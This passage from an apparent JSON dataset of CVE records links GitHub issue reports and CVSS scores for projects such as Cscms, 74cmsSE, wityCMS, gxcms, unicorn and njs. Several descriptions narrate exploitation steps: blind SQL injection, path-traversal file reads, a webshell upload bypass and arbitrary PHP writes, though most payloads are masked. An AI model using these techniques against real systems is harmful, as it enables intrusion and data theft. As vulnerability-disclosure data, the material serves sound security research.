  83091. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details there is a Injection vulnerability exists in APITAG The administrator needs to add a user to the member list after logging in. SQL injection vulnerability is generated when deleting the user. The constructed malicious payload is as follows FILETAG CODETAG FILETAG You can see that success makes the server sleep Construct payload to guess the database APITAG FILETAG FILETAG There is blind SQL injection. Because the database name is \"cscms\", the string returned by select APITAG starts with 'C', substr ((select + APITAG NUMBERTAG C' is true, and the verification is correct",
  83092. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  83093. "severity": "HIGH",
  83094. "baseScore": 7.2,
  83095. "impactScore": 5.9,
  83096. "exploitabilityScore": 1.2
  83097. },
  83098. {
  83099. "CVE_ID": "CVE-2022-29681",
  83100. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/35",
  83101. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/35",
  83102. "Repo_new": "chshcms/cscms",
  83103. "Issue_Created_At": "2022-04-20T01:40:45Z",
  83104. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details there is a Injection vulnerability exists in APITAG After logging in, the administrator needs to add a friendship link first. SQL injection vulnerability occurs when deleting the friendship link. The constructed malicious payload is as follows FILETAG CODETAG FILETAG You can see that success makes the server sleep Construct payload to guess the database APITAG FILETAG FILETAG There is blind SQL injection. Because the database name is \"cscms\", the string returned by select APITAG starts with 'C', substr ((select + APITAG NUMBERTAG C' is true, and the verification is correct",
  83105. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  83106. "severity": "HIGH",
  83107. "baseScore": 7.2,
  83108. "impactScore": 5.9,
  83109. "exploitabilityScore": 1.2
  83110. },
  83111. {
  83112. "CVE_ID": "CVE-2022-29682",
  83113. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/36",
  83114. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/36",
  83115. "Repo_new": "chshcms/cscms",
  83116. "Issue_Created_At": "2022-04-20T01:43:49Z",
  83117. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details there is a Injection vulnerability exists in APITAG The administrator needs to add a video theme after logging in. SQL injection vulnerability is generated when deleting the video theme. The constructed malicious payload is as follows FILETAG CODETAG FILETAG You can see that success makes the server sleep Construct payload to guess the database FILETAG FILETAG There is blind SQL injection. Because the database name is \"cscms\", the string returned by select APITAG starts with 'C', substr ((select + APITAG NUMBERTAG C' is true, and the verification is correct",
  83118. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  83119. "severity": "HIGH",
  83120. "baseScore": 7.2,
  83121. "impactScore": 5.9,
  83122. "exploitabilityScore": 1.2
  83123. },
  83124. {
  83125. "CVE_ID": "CVE-2022-29683",
  83126. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/34",
  83127. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/34",
  83128. "Repo_new": "chshcms/cscms",
  83129. "Issue_Created_At": "2022-04-20T01:36:23Z",
  83130. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details there is a Injection vulnerability exists in APITAG FILETAG CODETAG FILETAG You can see that success makes the server sleep Construct payload to guess the database APITAG FILETAG FILETAG There is blind SQL injection. Because the database name is \"cscms\", the string returned by select APITAG starts with 'C', substr ((select + APITAG NUMBERTAG C' is true, and the verification is correct",
  83131. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  83132. "severity": "HIGH",
  83133. "baseScore": 7.2,
  83134. "impactScore": 5.9,
  83135. "exploitabilityScore": 1.2
  83136. },
  83137. {
  83138. "CVE_ID": "CVE-2022-29684",
  83139. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/33",
  83140. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/33",
  83141. "Repo_new": "chshcms/cscms",
  83142. "Issue_Created_At": "2022-04-20T01:33:15Z",
  83143. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details there is a Injection vulnerability exists in APITAG FILETAG CODETAG FILETAG You can see that success makes the server sleep Construct payload to guess the database APITAG FILETAG FILETAG There is blind SQL injection. Because the database name is \"cscms\", the string returned by select APITAG starts with 'C', substr ((select + APITAG NUMBERTAG C' is true, and the verification is correct",
  83144. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  83145. "severity": "HIGH",
  83146. "baseScore": 7.2,
  83147. "impactScore": 5.9,
  83148. "exploitabilityScore": 1.2
  83149. },
  83150. {
  83151. "CVE_ID": "CVE-2022-29686",
  83152. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/29",
  83153. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/29",
  83154. "Repo_new": "chshcms/cscms",
  83155. "Issue_Created_At": "2022-04-20T01:14:41Z",
  83156. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details there is a Injection vulnerability exists in APITAG After logging in, the administrator needs to add a singer first. SQL injection vulnerability is generated when adding singers. The constructed malicious payload is as follows",
  83157. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  83158. "severity": "HIGH",
  83159. "baseScore": 7.2,
  83160. "impactScore": 5.9,
  83161. "exploitabilityScore": 1.2
  83162. },
  83163. {
  83164. "CVE_ID": "CVE-2022-29687",
  83165. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/30",
  83166. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/30",
  83167. "Repo_new": "chshcms/cscms",
  83168. "Issue_Created_At": "2022-04-20T01:21:31Z",
  83169. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG APITAG by APITAG Details there is a Injection vulnerability exists in APITAG The administrator needs to add a member after logging in. SQL injection vulnerability is generated when deleting the member. The constructed malicious payload is as follows CODETAG FILETAG You can see that success makes the server sleep Construct payload to guess the database APITAG FILETAG FILETAG There is blind SQL injection. Because the database name is \"cscms\", the string returned by select APITAG starts with 'C', substr ((select + APITAG NUMBERTAG C' is true, and the verification is correct",
  83170. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  83171. "severity": "HIGH",
  83172. "baseScore": 7.2,
  83173. "impactScore": 5.9,
  83174. "exploitabilityScore": 1.2
  83175. },
  83176. {
  83177. "CVE_ID": "CVE-2022-29688",
  83178. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/27",
  83179. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/27",
  83180. "Repo_new": "chshcms/cscms",
  83181. "Issue_Created_At": "2022-04-20T01:08:46Z",
  83182. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details There is a Injection vulnerability exists in APITAG After logging in, the administrator needs to add a song and then delete the song. When the song is recycled from the recycle bin, SQL injection vulnerability is generated. The injection point is ID, and the constructed malicious payload is as follows CODETAG FILETAG Discovery success makes the server sleep Construct payload database FILETAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds,so the vulnerablity exisit",
  83183. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  83184. "severity": "HIGH",
  83185. "baseScore": 7.2,
  83186. "impactScore": 5.9,
  83187. "exploitabilityScore": 1.2
  83188. },
  83189. {
  83190. "CVE_ID": "CVE-2022-29689",
  83191. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/28",
  83192. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/28",
  83193. "Repo_new": "chshcms/cscms",
  83194. "Issue_Created_At": "2022-04-20T01:12:49Z",
  83195. "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details there is a Injection vulnerability exists in APITAG After logging in, the administrator needs to add a singer first and then delete the singer. When deleting the singer, SQL injection vulnerability is generated. The injection point is ID, and the constructed malicious payload is as follows CODETAG FILETAG You can see that success makes the server sleep Construct payload database FILETAG FILETAG There is blind SQL injection. Because the database name is \"cscms\", the string returned by select APITAG starts with 'C', substr ((select + APITAG NUMBERTAG C' is true, and the verification is correct",
  83196. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  83197. "severity": "HIGH",
  83198. "baseScore": 7.2,
  83199. "impactScore": 5.9,
  83200. "exploitabilityScore": 1.2
  83201. },
  83202. {
  83203. "CVE_ID": "CVE-2022-29692",
  83204. "Issue_Url_old": "https://github.com/unicorn-engine/unicorn/issues/1578",
  83205. "Issue_Url_new": "https://github.com/unicorn-engine/unicorn/issues/1578",
  83206. "Repo_new": "unicorn-engine/unicorn",
  83207. "Issue_Created_At": "2022-04-01T09:53:58Z",
  83208. "description": "Null pointer caused by UAF in unicorn NUMBERTAG Hello, :) Unicorn NUMBERTAG Python API Add APITAG to the hook function (uc_hook_mem_read_unmapped) Releasing the hook function will cause the null pointer dereference. I'm not sure if it's a UAF. APITAG is as follows ERRORTAG gdb debug ERRORTAG",
  83209. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  83210. "severity": "HIGH",
  83211. "baseScore": 7.8,
  83212. "impactScore": 5.9,
  83213. "exploitabilityScore": 1.8
  83214. },
  83215. {
  83216. "CVE_ID": "CVE-2022-29693",
  83217. "Issue_Url_old": "https://github.com/unicorn-engine/unicorn/issues/1586",
  83218. "Issue_Url_new": "https://github.com/unicorn-engine/unicorn/issues/1586",
  83219. "Repo_new": "unicorn-engine/unicorn",
  83220. "Issue_Created_At": "2022-04-11T07:30:52Z",
  83221. "description": "Memory leaks caused by unexpected architecture in unicorn dev branch. Hi :) When we used unexpected architecture such as APITAG , there was a memory leak in unicorn2. APITAG ERRORTAG If we don't use APITAG , there will be a memory leak. ERRORTAG If we use APITAG , there will be a segmentation fault! ERRORTAG",
  83222. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  83223. "severity": "HIGH",
  83224. "baseScore": 7.5,
  83225. "impactScore": 3.6,
  83226. "exploitabilityScore": 3.9
  83227. },
  83228. {
  83229. "CVE_ID": "CVE-2022-29694",
  83230. "Issue_Url_old": "https://github.com/unicorn-engine/unicorn/issues/1588",
  83231. "Issue_Url_new": "https://github.com/unicorn-engine/unicorn/issues/1588",
  83232. "Repo_new": "unicorn-engine/unicorn",
  83233. "Issue_Created_At": "2022-04-12T12:06:38Z",
  83234. "description": "Null pointer dereference in APITAG when the HVA malloc fails. When APITAG is used to request a very large memory region, the host-side (HVA) allocation fails while the guest-side (GVA) allocation succeeds. This inconsistency leads to a null pointer dereference when APITAG releases the block requested by APITAG. APITAG ERRORTAG output ERRORTAG",
  83235. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  83236. "severity": "HIGH",
  83237. "baseScore": 7.5,
  83238. "impactScore": 3.6,
  83239. "exploitabilityScore": 3.9
  83240. },
  83241. {
  83242. "CVE_ID": "CVE-2022-29695",
  83243. "Issue_Url_old": "https://github.com/unicorn-engine/unicorn/issues/1595",
  83244. "Issue_Url_new": "https://github.com/unicorn-engine/unicorn/issues/1595",
  83245. "Repo_new": "unicorn-engine/unicorn",
  83246. "Issue_Created_At": "2022-04-16T09:35:23Z",
  83247. "description": "Memory leaks caused by incomplete unicorn engine initialization. Unicorn NUMBERTAG provides a new API ( APITAG ) that allows the host to change the architecture and mode of the CPU. However, this API does not check whether the requested architecture and mode are supported by unicorn, and unicorn does not check the result of engine initialization either. In other words, initializing the engine with an unexpected architecture or mode allocates memory during initialization that is never released. CODETAG Although APITAG is equal to zero, something is still allocated in memory regions such as APITAG . APITAG ERRORTAG Debug info ERRORTAG",
  83248. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  83249. "severity": "HIGH",
  83250. "baseScore": 7.5,
  83251. "impactScore": 3.6,
  83252. "exploitabilityScore": 3.9
  83253. },
  83254. {
  83255. "CVE_ID": "CVE-2022-29720",
  83256. "Issue_Url_old": "https://github.com/PAINCLOWN/74cmsSE-Arbitrary-File-Reading/issues/1",
  83257. "Issue_Url_new": "https://github.com/painclown/74cmsse-arbitrary-file-reading/issues/1",
  83258. "Repo_new": "PAINCLOWN/74cmsSE-Arbitrary-File-Reading",
  83259. "Issue_Created_At": "2022-04-21T12:06:00Z",
  83260. "description": "APITAG NUMBERTAG Arbitrary file read. Vulnerability Name: Arbitrary File Read. Date of Discovery: PATHTAG. Product version: APITAG. Download link: URLTAG. Vulnerability Description: arbitrary file read is a file-operation vulnerability that lets an attacker read configuration files and other sensitive files on the server; in the reporter's assessment it may in severe cases be chained into SSRF against the internal network. Root cause: the application exposes a function that reads a file, the path it reads is user-controllable and is not validated (or not validated strictly), and the file contents are returned to the client. POC: GET PATHTAG HTTP NUMBERTAG Host: APITAG APITAG APITAG Sec Ch Ua: \" Not APITAG APITAG Sec Ch Ua Mobile NUMBERTAG Upgrade Insecure Requests NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Accept: PATHTAG /\\ ; APITAG exchange;v=b3;q NUMBERTAG Sec Fetch Site: none Sec Fetch Mode: navigate Sec Fetch User NUMBERTAG Sec Fetch Dest: document Accept Encoding: gzip, deflate Accept Language: zh CN,zh;q NUMBERTAG Connection: close Code: PATHTAG FILETAG The \\$url parameter is passed straight into the read with no whitelist restriction, so a path-traversal sequence /.. / ( APITAG the parent directory) reads arbitrary server files. PATHTAG FILETAG Proof: the following site runs APITAG FILETAG; payload: APITAG reads the site's database configuration file FILETAG and other files FILETAG. Fix suggestion: sanitize the input: resolve the user-supplied file name against a fixed base directory and reject any canonical path that escapes it (or map user input onto a hard-coded set of allowed names), whitelist the permitted file types, and reject parameters containing path-traversal sequences or null bytes.",
  83261. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  83262. "severity": "HIGH",
  83263. "baseScore": 7.5,
  83264. "impactScore": 3.6,
  83265. "exploitabilityScore": 3.9
  83266. },
  83267. {
  83268. "CVE_ID": "CVE-2022-29721",
  83269. "Issue_Url_old": "https://github.com/PAINCLOWN/74cmsSE-Arbitrary-File-Reading/issues/2",
  83270. "Issue_Url_new": "https://github.com/painclown/74cmsse-arbitrary-file-reading/issues/2",
  83271. "Repo_new": "PAINCLOWN/74cmsSE-Arbitrary-File-Reading",
  83272. "Issue_Created_At": "2022-04-23T02:09:56Z",
  83273. "description": "SQL Injection vulnerability in NUMBERTAG cmsse. Exploit Title: SQL Injection vulnerability in APITAG. Date of Discovery: PATHTAG. Product: APITAG. Download link: URLTAG. Vulnerability Description: APITAG has a time-based blind SQL injection that allows an attacker to run malicious SQL statements against the database and thereby obtain sensitive database data. FILETAG In the path PATHTAG the \\$keyword parameter is not strictly filtered, resulting in SQL injection. POC: URL1: FILETAG Payload: URLTAG As the figure below shows, the APITAG function is executed, confirming time-based blind SQL injection FILETAG FILETAG When sleep NUMBERTAG FILETAG With the payload above the delay was observed in two out of NUMBERTAG attempts. The time-based blind can be used to guess the length of the database name: Payload: URLTAG URLTAG FILETAG The database name of the site is NUMBERTAG cmsse, the delay is exactly half the length of APITAG, and the injection succeeds FILETAG The same applies to the following test case URL2: APITAG payload: URLTAG URLTAG APITAG FILETAG FILETAG sleep NUMBERTAG FILETAG Guess the length of the database name: the injection succeeds FILETAG FILETAG URL3: APITAG Payload: URLTAG URLTAG FILETAG FILETAG sleep NUMBERTAG FILETAG Guess the length of the database name: the injection succeeds, as seen from the graph FILETAG The following are other test cases that testers can verify on their own: URL4: APITAG URL5: FILETAG URL6: FILETAG URL7: FILETAG URL8: FILETAG URL9: FILETAG URL NUMBERTAG APITAG URL NUMBERTAG FILETAG URL NUMBERTAG APITAG It is a time-based SQL injection. Suggestion: pass \\$keyword to the database through a parameterized (prepared) query rather than relying on an input filter function.",
  83274. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  83275. "severity": "HIGH",
  83276. "baseScore": 7.5,
  83277. "impactScore": 3.6,
  83278. "exploitabilityScore": 3.9
  83279. },
  83280. {
  83281. "CVE_ID": "CVE-2022-29725",
  83282. "Issue_Url_old": "https://github.com/Creatiwity/wityCMS/issues/161",
  83283. "Issue_Url_new": "https://github.com/creatiwity/witycms/issues/161",
  83284. "Repo_new": "creatiwity/witycms",
  83285. "Issue_Created_At": "2022-04-22T05:27:54Z",
  83286. "description": "There is a file upload vulnerability in the backend settings page. The server environment is Windows. After logging in to the backend, click Settings: the ico image upload point there has a file upload vulnerability whose check can be bypassed, so a webshell can be uploaded through it and the server taken over. Vulnerability location: URLTAG FILETAG APITAG the shell file, capture the request APITAG, set Content Type to image/ico, and set the filename to .php followed by spaces to bypass the check FILETAG (presumably the trailing spaces are stripped when the file is saved on Windows, leaving a plain .php file). APITAG the response packet is NUMBERTAG and the file itself has been uploaded. APITAG the uploaded file is located in the \\upload\\settings directory, named FILETAG FILETAG. APITAG the connection succeeds through the \"ice scorpion\" (Behinder) webshell client, and a shell on the server is obtained. FILETAG FILETAG topsec deepzz",
  83287. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  83288. "severity": "HIGH",
  83289. "baseScore": 8.8,
  83290. "impactScore": 5.9,
  83291. "exploitabilityScore": 2.8
  83292. },
  83293. {
  83294. "CVE_ID": "CVE-2022-29767",
  83295. "Issue_Url_old": "https://github.com/adbyby/Files/issues/2",
  83296. "Issue_Url_new": "https://github.com/adbyby/files/issues/2",
  83297. "Repo_new": "adbyby/files",
  83298. "Issue_Created_At": "2022-04-23T10:04:40Z",
  83299. "description": "APITAG NUMBERTAG IPQ NUMBERTAG AP CP NUMBERTAG C1 APITAG APITAG / APITAG Master (git NUMBERTAG APITAG NUMBERTAG c NUMBERTAG f) FILETAG APITAG FILETAG \u6f0f\u6d1e\u89e6\u53d1\u65b9\u5f0f\uff1a \u901a\u8fc7\u8bbf\u95eehttp://\u3010\u8def\u7531ip NUMBERTAG FILETAG FILETAG FILETAG \u539f\uff1a FILETAG \u539f\u56e0\uff1a APITAG FILETAG FILETAG FILETAG \u4e34\u65f6\u4fee\u590d\u5efa\u8bae\uff1a \u4e00\uff1a\u4f7f\u7528iptables NUMBERTAG iptables A INPUT p tcp \u2013dport NUMBERTAG i <eth0 \u4f60\u7684\u516c\u7f51\u51fa\u53e3> j reject \u4e8c\uff1a\u5173\u95edadbyby FILETAG",
  83300. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  83301. "severity": "MEDIUM",
  83302. "baseScore": 6.5,
  83303. "impactScore": 3.6,
  83304. "exploitabilityScore": 2.8
  83305. },
  83306. {
  83307. "CVE_ID": "CVE-2022-29770",
  83308. "Issue_Url_old": "https://github.com/xuxueli/xxl-job/issues/2836",
  83309. "Issue_Url_new": "https://github.com/xuxueli/xxl-job/issues/2836",
  83310. "Repo_new": "xuxueli/xxl-job",
  83311. "Issue_Created_At": "2022-04-23T15:02:41Z",
  83312. "description": "There is a stored XSS vulnerability in the task management page of xxl-job. Which version of XXL-JOB are you using: NUMBERTAG. Expected behavior: stored XSS (the payload is persisted and executes when the task is later viewed). APITAG poc APITAG APITAG FILETAG NUMBERTAG press submit FILETAG NUMBERTAG the XSS attack occurs FILETAG",
  83313. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  83314. "severity": "MEDIUM",
  83315. "baseScore": 5.4,
  83316. "impactScore": 2.7,
  83317. "exploitabilityScore": 2.3
  83318. },
  83319. {
  83320. "CVE_ID": "CVE-2022-29779",
  83321. "Issue_Url_old": "https://github.com/nginx/njs/issues/485",
  83322. "Issue_Url_new": "https://github.com/nginx/njs/issues/485",
  83323. "Repo_new": "nginx/njs",
  83324. "Issue_Created_At": "2022-03-16T09:40:33Z",
  83325. "description": "SEGV APITAG in njs_value_own_enumerate. Environment OS : Linux leanderwang LC NUMBERTAG generic URLTAG SMP Mon Feb NUMBERTAG UTC NUMBERTAG APITAG Commit : URLTAG Version NUMBERTAG Build : NJS_CFLAGS=\"$NJS_CFLAGS fsanitize=address\" NJS_CFLAGS=\"$NJS_CFLAGS fno omit frame pointer\" APITAG ERRORTAG Stack dump ERRORTAG Credit xmzyshypnc( APITAG and P1umer( APITAG",
  83326. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  83327. "severity": "MEDIUM",
  83328. "baseScore": 5.5,
  83329. "impactScore": 3.6,
  83330. "exploitabilityScore": 1.8
  83331. },
  83332. {
  83333. "CVE_ID": "CVE-2022-29780",
  83334. "Issue_Url_old": "https://github.com/nginx/njs/issues/486",
  83335. "Issue_Url_new": "https://github.com/nginx/njs/issues/486",
  83336. "Repo_new": "nginx/njs",
  83337. "Issue_Created_At": "2022-03-21T02:29:41Z",
  83338. "description": "SEGV in njs_array_prototype_sort . Environment OS : Linux leanderwang LC NUMBERTAG generic URLTAG SMP Mon Feb NUMBERTAG UTC NUMBERTAG APITAG Commit : URLTAG Version NUMBERTAG Build : NJS_CFLAGS=\"$NJS_CFLAGS fsanitize=address\" NJS_CFLAGS=\"$NJS_CFLAGS fno omit frame pointer\" APITAG ERRORTAG Stack dump ERRORTAG Credit xmzyshypnc( APITAG and P1umer( APITAG",
  83339. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  83340. "severity": "MEDIUM",
  83341. "baseScore": 5.5,
  83342. "impactScore": 3.6,
  83343. "exploitabilityScore": 1.8
  83344. },
  83345. {
  83346. "CVE_ID": "CVE-2022-29973",
  83347. "Issue_Url_old": "https://github.com/relan/exfat/issues/185",
  83348. "Issue_Url_new": "https://github.com/relan/exfat/issues/185",
  83349. "Repo_new": "relan/exfat",
  83350. "Issue_Created_At": "2022-05-01T23:02:44Z",
  83351. "description": "Information disclosure in fuse-exfat. Affected versions: NUMBERTAG and the latest code NUMBERTAG e4f NUMBERTAG. Details: In the APITAG file system, each file has a stream extension with the following fields defined (among others): APITAG and APITAG ( URLTAG ). The former is the file size; the latter is the highest file offset that has been written. According to the official APITAG specification, bytes after APITAG are undefined and \" FILETAG FILETAG FILETAG",
  83352. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
  83353. "severity": "MEDIUM",
  83354. "baseScore": 4.7,
  83355. "impactScore": 3.6,
  83356. "exploitabilityScore": 1.0
  83357. },
  83358. {
  83359. "CVE_ID": "CVE-2022-29977",
  83360. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/165",
  83361. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/165",
  83362. "Repo_new": "saitoha/libsixel",
  83363. "Issue_Created_At": "2022-04-23T16:47:52Z",
  83364. "description": "Assertion failure in stbi__jpeg_huff_decode, APITAG There is an assertion failure error in stbi__jpeg_huff_decode, APITAG CODETAG FILETAG",
  83365. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  83366. "severity": "MEDIUM",
  83367. "baseScore": 6.5,
  83368. "impactScore": 3.6,
  83369. "exploitabilityScore": 2.8
  83370. },
  83371. {
  83372. "CVE_ID": "CVE-2022-29978",
  83373. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/166",
  83374. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/166",
  83375. "Repo_new": "saitoha/libsixel",
  83376. "Issue_Created_At": "2022-04-25T06:12:49Z",
  83377. "description": "FPE in sixel_encoder_do_resize, APITAG Description There is a floating point exception error in sixel_encoder_do_resize, APITAG in img2sixel NUMBERTAG Remote attackers could leverage this vulnerability to cause a denial of service via a crafted JPEG file. Version img2sixel NUMBERTAG commit id URLTAG APITAG Jan NUMBERTAG Reproduction ERRORTAG FILETAG Platform ERRORTAG",
  83378. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  83379. "severity": "MEDIUM",
  83380. "baseScore": 6.5,
  83381. "impactScore": 3.6,
  83382. "exploitabilityScore": 2.8
  83383. },
  83384. {
  83385. "CVE_ID": "CVE-2022-30007",
  83386. "Issue_Url_old": "https://github.com/breezety/gxcms15/issues/1",
  83387. "Issue_Url_new": "https://github.com/breezety/gxcms15/issues/1",
  83388. "Repo_new": "breezety/gxcms15",
  83389. "Issue_Created_At": "2022-04-25T12:58:33Z",
  83390. "description": "A file upload vulnerability exists in the backend. APITAG code audit: the vulnerability is in the template management page of the backend: FILETAG PATHTAG. The HTML file name is received in the filename parameter and its content in the content parameter, and the data is then sent to ?s= PATHTAG FILETAG. Tracing ?s= PATHTAG to the page PATHTAG class.php file, the Update function receives the filename and content variables, checks only that they are non-empty, and then writes the data straight to disk with the write_file function with no validation of the file name or contents. This is an arbitrary file write, i.e. an arbitrary file upload vulnerability. FILETAG APITAG exploit: log in to the backend of the target site using the default admin credentials (admin / admin NUMBERTAG), a brute-forced password, or phishing (administrator access is required, consistent with PR:H in the vector); click Template Management to enter the PATHTAG directory, select any file and click Edit: FILETAG. On the edit page, enter PHP test code in the file content form, start the APITAG tool to capture the request, and click Submit: FILETAG. After APITAG captures the request, change the filename suffix to .php and click APITAG the packet: FILETAG FILETAG. The file is created successfully and the PHP test code executes. FILETAG FILETAG",
  83391. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  83392. "severity": "HIGH",
  83393. "baseScore": 7.2,
  83394. "impactScore": 5.9,
  83395. "exploitabilityScore": 1.2
  83396. },
  83397. {
  83398. "CVE_ID": "CVE-2022-30034",
  83399. "Issue_Url_old": "https://github.com/mher/flower/issues/1217",
  83400. "Issue_Url_new": "https://github.com/mher/flower/issues/1217",
  83401. "Repo_new": "mher/flower",
  83402. "Issue_Created_At": "2022-05-26T18:33:06Z",
  83403. "description": "Security vulnerabilities in Flower: APITAG authentication bypass and lack of CSRF protections ( CVETAG ). Ref: APITAG. (1) Flower is unauthenticated by default and lacks CSRF protections. (2) Flower's APITAG support is vulnerable to a bypass that allows anyone to authenticate regardless of the APITAG restriction. Due to a lack of response from the maintainer, these issues were publicly disclosed on NUMBERTAG May NUMBERTAG along with PR NUMBERTAG. Until a fix is applied, Flower should not be reachable from untrusted networks.",
  83404. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H",
  83405. "severity": "HIGH",
  83406. "baseScore": 8.6,
  83407. "impactScore": 4.7,
  83408. "exploitabilityScore": 3.9
  83409. },
  83410. {
  83411. "CVE_ID": "CVE-2022-30049",
  83412. "Issue_Url_old": "https://github.com/getrebuild/rebuild/issues/460",
  83413. "Issue_Url_new": "https://github.com/getrebuild/rebuild/issues/460",
  83414. "Repo_new": "getrebuild/rebuild",
  83415. "Issue_Created_At": "2022-04-27T12:45:46Z",
  83416. "description": "SSRF vulnerability. Location of the vulnerability: APITAG, whose request parameter is a URL FILETAG. APITAG passes it to APITAG Httpurl.Get, which fetches the attacker-supplied URL and thereby triggers the SSRF FILETAG. Vulnerability proof screenshot FILETAG",
  83417. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  83418. "severity": "HIGH",
  83419. "baseScore": 7.5,
  83420. "impactScore": 3.6,
  83421. "exploitabilityScore": 3.9
  83422. },
  83423. {
  83424. "CVE_ID": "CVE-2022-30288",
  83425. "Issue_Url_old": "https://github.com/ohler55/agoo/issues/109",
  83426. "Issue_Url_new": "https://github.com/ohler55/agoo/issues/109",
  83427. "Repo_new": "ohler55/agoo",
  83428. "Issue_Created_At": "2022-05-04T03:22:12Z",
  83429. "description": "Agoo fragment cycle security vulnerability. Agoo versions NUMBERTAG and below do not perform request validation, so a request containing a fragment cycle (fragments that reference each other recursively) expands without bound and crashes the Agoo instance (denial of service). Sample exploit script: CODETAG For more information see: FILETAG Spec ref: URLTAG",
  83430. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  83431. "severity": "HIGH",
  83432. "baseScore": 7.5,
  83433. "impactScore": 3.6,
  83434. "exploitabilityScore": 3.9
  83435. },
  83436. {
  83437. "CVE_ID": "CVE-2022-30334",
  83438. "Issue_Url_old": "https://github.com/brave/brave-browser/issues/18071",
  83439. "Issue_Url_new": "https://github.com/brave/brave-browser/issues/18071",
  83440. "Repo_new": "brave/brave-browser",
  83441. "Issue_Created_At": "2021-09-13T23:57:55Z",
  83442. "description": "Strip referrer and origin in cross origin requests from a APITAG origin. If a cross origin request originates from a APITAG service, we should match the Tor Browser behavior and: omit the Referer header send a value of null for the Origin header whenever present (e.g. in the case of a POST request) Same origin requests should follow our normal referrer policy URLTAG . Test page: FILETAG",
  83443. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  83444. "severity": "MEDIUM",
  83445. "baseScore": 5.3,
  83446. "impactScore": 1.4,
  83447. "exploitabilityScore": 3.9
  83448. },
  83449. {
  83450. "CVE_ID": "CVE-2022-30427",
  83451. "Issue_Url_old": "https://github.com/gphper/ginadmin/issues/8",
  83452. "Issue_Url_new": "https://github.com/gphper/ginadmin/issues/8",
  83453. "Repo_new": "gphper/ginadmin",
  83454. "Issue_Created_At": "2022-05-04T09:57:30Z",
